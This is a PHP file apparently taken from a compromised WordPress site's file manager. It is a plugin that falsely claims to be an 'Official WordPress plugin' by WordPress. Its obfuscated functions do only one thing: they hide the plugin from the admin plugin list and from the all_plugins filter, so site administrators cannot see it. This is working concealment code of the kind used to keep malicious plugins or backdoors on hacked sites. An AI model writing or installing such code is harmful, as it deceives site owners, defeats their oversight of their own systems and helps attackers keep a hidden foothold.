File "wp-processing-holland.php"

Full Path: /home/theinspectionboy/public_html/suffolk/wp-processing-holland/wp-processing-holland.php
File size: 955 bytes
MIME-type: text/x-php
Charset: utf-8

<?php
/*
Plugin Name: WP Processing Holland
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 7.0.2
Author URI: http://wordpress.org/#
License: GPL2
*/

function zro_aoq()
{
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $h = array('wp-processing-holland/wp-processing-holland.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $h)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

function fec_jlc($plugins)
{
    $p = 'wp-processing-holland/wp-processing-holland.php';
    if (array_key_exists($p, $plugins)) {
        unset($plugins[$p]);
    }
    return $plugins;
}

if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'zro_aoq');
    add_filter('all_plugins', 'fec_jlc');
}